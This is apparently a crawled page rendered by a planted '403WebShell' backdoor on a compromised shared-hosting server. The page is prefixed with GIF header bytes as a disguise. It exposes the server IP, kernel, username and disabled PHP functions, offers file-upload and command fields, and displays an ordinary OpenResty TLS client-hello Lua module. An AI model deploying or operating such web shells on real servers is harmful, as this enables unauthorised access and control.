GIF89a=( ý' 7IAXKgNgYvYx\%wh&h}týh%ýs%xý}9ýRýý&ý0%ý (ý.ýý5ýSDýý&ýa)ýx5ýý;c*!&r)ï7õ<{4ý3ýH§KoTýýYýaqýýqýýFý !ý ' !ý NETSCAPE2.0 , =( ýýpH,ý$rýl:x(tJýZý,výýzýýxL.:ýýzýnýýý|Nýýýýý~ýýýýýýý& !ý0`9Rý}ýý"ý"a:Sý~xýýýýýýýýgýýýEýýýýýýýRýýýEýýýýBýý ýý8ýýDýýý"ýný ýHýýLýýDkDýBýýýýýDýýýTýýýH ýGýýA Rý |ýý m&ýýE8ýSýkGýAýpxýaýýý R2XBýýE8Iýýý6Xý:vT)ý~ýýqýåýý"F~%xý ý 4#Zý0O|-4BsýX:= Qý SalýýyXJ`G&|s hýýK3l7ýB|ý$'7J©*0!ýýDýn=ýPý ýýýý0`ýRýljýýýýv>ýýý5 ý.69ýødýýýýýnlvý9ýýf{ýýýPbx ýl5}ýpý ýýý ý3aýýýIýOýýýý!>ýýýiýý9ýý#ýý)pýa ½ ý{ý)vmýý%D~ 6fýýs}RýDýW Eý`!ý ý&L8xý ý{)x`X/>ý}mýýRý*|`Dý=ý_ ^ý5 !_&'aýOý7ýcýý`DCx`ý¥ý9ýYýFýýý`?ýý"ý ýn@`ý} lýý@4>ýd S ývýxNýý"@~dýý=ýgýs~Gýýý ýýýud &p8Qý)«lXDýýýýA~HýySunýjýýýk*DýLHý] ýýC"JýýXb~ªwSt}6K,ýýqýS:9*:ýýýlý@ý`ýý ý.ìýt9ýSý[©:ýý=`9Nýýýý{¿ýA !Rý:ýýý6ýýxý0ý_ ý;ýýýýýý^ýýý#ýýýý!ýýýýUýýý;0L1ýýýýýp% AýýU,uýý%ýSýý!ýýý~`ýGýýýý ýýý=4ýnpý3ýýýýýýýýýuýuýn|%2ýIýýrý#0ýýJ``8ý@S@5ý ýýý^`8Eý]ý.ýSýýý7 ý ý0ýj SýDý zýýýiýSýýýýý!ýýýlýýw9*ýDýIýnEXýýý &AýGoýQfýýFýý;ýýý}ýJýýýýF5ýýQ|ýýýXýýTýýyýýý]ý o ýýC=ýý:ýýýPB@ DýSý(>ýCýx}`ýýxJ,ýàýýp+eE0`ý}`A ý/NEýý ý9@ýýý Hý7ý!%B0`ýl*ýý!8 2ý%ý ý:ý1ý0Eýýux%nP1ý!ýC)ýP81lýxF#¬{ýýýýB0>ýý 403WebShell
403Webshell
Server IP : 217.18.85.50  /  Your IP : 3.17.175.167
Web Server : LiteSpeed
System : Linux server50.tr85.dhs.com.tr 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User : ferhatgenc ( )
PHP Version : 7.2.34
Disable Function : restore_ini,mail,openbasedir,f_open,system,dl,array_compare,array_user_key_compare,passthru,cat,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,ini_restore,mysql_list_dbs,getmyuid,pconnect,link,symlink,fin,passthruexec,fileread,shell_exec,pcntl_exec,ini_alter,leak,apache_child_terminate,chown,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,allow_url_fopen,fpassthru,execute,shell,chgrp,passthru,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,foreach,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_version,apache_getenv,apache_note,apache_setenv,virtualal
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360-webshield/lualib/ngx/ssl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360-webshield/lualib/ngx/ssl/clienthello.lua
-- Copyright (C) Yichun Zhang (agentzh)


local base = require "resty.core.base"
base.allows_subsystem('http', 'stream')


local ffi = require "ffi"
local bit  = require "bit"
local bor = bit.bor
local C = ffi.C
local ffi_str = ffi.string
local get_request = base.get_request
local error = error
local errmsg = base.get_errmsg_ptr()
local get_size_ptr = base.get_size_ptr
local FFI_OK = base.FFI_OK
local subsystem = ngx.config.subsystem
local ngx_phase = ngx.get_phase
local byte = string.byte
local lshift = bit.lshift
local table_insert = table.insert


local ngx_lua_ffi_ssl_get_client_hello_server_name
local ngx_lua_ffi_ssl_get_client_hello_ext
local ngx_lua_ffi_ssl_set_protocols


if subsystem == 'http' then
    ffi.cdef[[
    int ngx_http_lua_ffi_ssl_get_client_hello_server_name(ngx_http_request_t *r,
        const char **name, size_t *namelen, char **err);

    int ngx_http_lua_ffi_ssl_get_client_hello_ext(ngx_http_request_t *r,
        unsigned int type, const unsigned char **out, size_t *outlen,
        char **err);

    int ngx_http_lua_ffi_ssl_set_protocols(ngx_http_request_t *r,
        int protocols, char **err);
    ]]

    ngx_lua_ffi_ssl_get_client_hello_server_name =
        C.ngx_http_lua_ffi_ssl_get_client_hello_server_name
    ngx_lua_ffi_ssl_get_client_hello_ext =
        C.ngx_http_lua_ffi_ssl_get_client_hello_ext
    ngx_lua_ffi_ssl_set_protocols = C.ngx_http_lua_ffi_ssl_set_protocols

elseif subsystem == 'stream' then
    ffi.cdef[[
    int ngx_stream_lua_ffi_ssl_get_client_hello_server_name(
        ngx_stream_lua_request_t *r, const char **name, size_t *namelen,
        char **err);

    int ngx_stream_lua_ffi_ssl_get_client_hello_ext(
        ngx_stream_lua_request_t *r, unsigned int type,
        const unsigned char **out, size_t *outlen, char **err);

    int ngx_stream_lua_ffi_ssl_set_protocols(ngx_stream_lua_request_t *r,
        int protocols, char **err);
    ]]

    ngx_lua_ffi_ssl_get_client_hello_server_name =
        C.ngx_stream_lua_ffi_ssl_get_client_hello_server_name
    ngx_lua_ffi_ssl_get_client_hello_ext =
        C.ngx_stream_lua_ffi_ssl_get_client_hello_ext
    ngx_lua_ffi_ssl_set_protocols = C.ngx_stream_lua_ffi_ssl_set_protocols
end


local _M = { version = base.version }


local ccharpp = ffi.new("const char*[1]")
local cucharpp = ffi.new("const unsigned char*[1]")


-- return server_name, err
function _M.get_client_hello_server_name()
    local r = get_request()
    if not r then
        error("no request found")
    end

    if ngx_phase() ~= "ssl_client_hello" then
        error("API disabled in the current context")
    end

    local sizep = get_size_ptr()

    local rc = ngx_lua_ffi_ssl_get_client_hello_server_name(r, ccharpp, sizep,
                errmsg)
    if rc == FFI_OK then
        return ffi_str(ccharpp[0], sizep[0])
    end

    -- NGX_DECLINED: no sni extension
    if rc == -5 then
        return nil
    end

    return nil, ffi_str(errmsg[0])
end


-- return ext, err
function _M.get_client_hello_ext(ext_type)
    local r = get_request()
    if not r then
        error("no request found")
    end

    if ngx_phase() ~= "ssl_client_hello" then
        error("API disabled in the current context")
    end

    local sizep = get_size_ptr()

    local rc = ngx_lua_ffi_ssl_get_client_hello_ext(r, ext_type, cucharpp,
                                                    sizep, errmsg)
    if rc == FFI_OK then
        return ffi_str(cucharpp[0], sizep[0])
    end

    -- NGX_DECLINED: no extension
    if rc == -5 then
        return nil
    end

    return nil, ffi_str(errmsg[0])
end

-- tls.handshake.extension.type supported_version
local supported_versions_type = 43
local versions_map = {
    [0x002] = "SSLv2",
    [0x300] = "SSLv3",
    [0x301] = "TLSv1",
    [0x302] = "TLSv1.1",
    [0x303] = "TLSv1.2",
    [0x304] = "TLSv1.3",
}

-- return types, err
function _M.get_supported_versions()
    local r = get_request()
    if not r then
        error("no request found")
    end

    if ngx_phase() ~= "ssl_client_hello" then
        error("API disabled in the current context")
    end

    local sizep = get_size_ptr()

    local rc = ngx_lua_ffi_ssl_get_client_hello_ext(r, supported_versions_type,
                                                    cucharpp, sizep, errmsg)

    if rc ~= FFI_OK then
        -- NGX_DECLINED: no extension
        if rc == -5 then
            return nil
        end

        return nil, ffi_str(errmsg[0])
    end

    local supported_versions_str = ffi_str(cucharpp[0], sizep[0])
    local remain_len = #supported_versions_str
    if remain_len == 0 then
        return nil
    end

    local supported_versions_len = byte(supported_versions_str, 1)
    remain_len = remain_len - 1

    if remain_len ~= supported_versions_len then
        return nil
    end
    local types = {}
    while remain_len >= 2  do
        local type_hi = byte(supported_versions_str, remain_len)
        local type_lo = byte(supported_versions_str, remain_len + 1)
        local type_id = lshift(type_hi, 8) + type_lo
        if versions_map[type_id] ~= nil then
            table_insert(types, versions_map[type_id])
        end
        remain_len = remain_len - 2
    end
    return types
end


local prot_map  = {
  ["SSLv2"] = 0x0002,
  ["SSLv3"] = 0x0004,
  ["TLSv1"] = 0x0008,
  ["TLSv1.1"] = 0x0010,
  ["TLSv1.2"] = 0x0020,
  ["TLSv1.3"] = 0x0040
}


-- return ok, err
function _M.set_protocols(protocols)
    local r = get_request()
    if not r then
        error("no request found")
    end

    if ngx_phase() ~= "ssl_client_hello" then
        error("API disabled in the current context")
    end

    local prots = 0
    for _, v in ipairs(protocols) do
        if not prot_map[v] then
            return nil, "invalid protocols failed"
        end
        prots = bor(prots, prot_map[v])
    end

    local rc = ngx_lua_ffi_ssl_set_protocols(r, prots, errmsg)
    if rc == FFI_OK then
        return true
    end

    return nil, ffi_str(errmsg[0])
end

return _M

Youez - 2016 - github.com/yon3zu
LinuXploit